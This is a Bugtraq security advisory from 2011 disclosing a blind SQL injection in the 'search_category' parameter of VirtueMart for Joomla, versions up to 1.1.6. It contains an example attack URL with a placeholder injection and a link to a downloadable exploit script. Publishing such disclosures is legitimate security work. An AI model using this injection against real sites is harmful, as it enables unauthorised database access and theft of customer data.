[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: VirtueMart eCommerce for Joomla <= 1.1.6 Blind SQL Injection
From: Andrea Fabrizi <andrea.fabrizi () gmail ! com>
Date: 2011-01-31 9:35:15
Message-ID: AANLkTime4yiAuAopsPMihUS0y6_Vs_zVogJJUovT9Nn4 () mail ! gmail ! com
[Download RAW message or body]
**************************************************************
Application: VirtueMart
Version affected: <= 1.1.6
Website: http://www.virtuemart.net/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com
Web: http://www.andreafabrizi.it
Vuln: Blind SQL Injection
**************************************************************
Blind SQL Injection found in "search_category" parameter.
Example:
http://127.0.0.1/index.php?category_id=&page=shop.browse&option=com_virtuemart&Itemid= \
1&keyword1=hand&search_op=and&keyword2=&search_limiter=anywhere&search=Search&search_category=3
AND $BLIND_SQL --
EXPLOIT: http://www.andreafabrizi.it/download.php?file=virtuemart_sql_exploit.sh
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic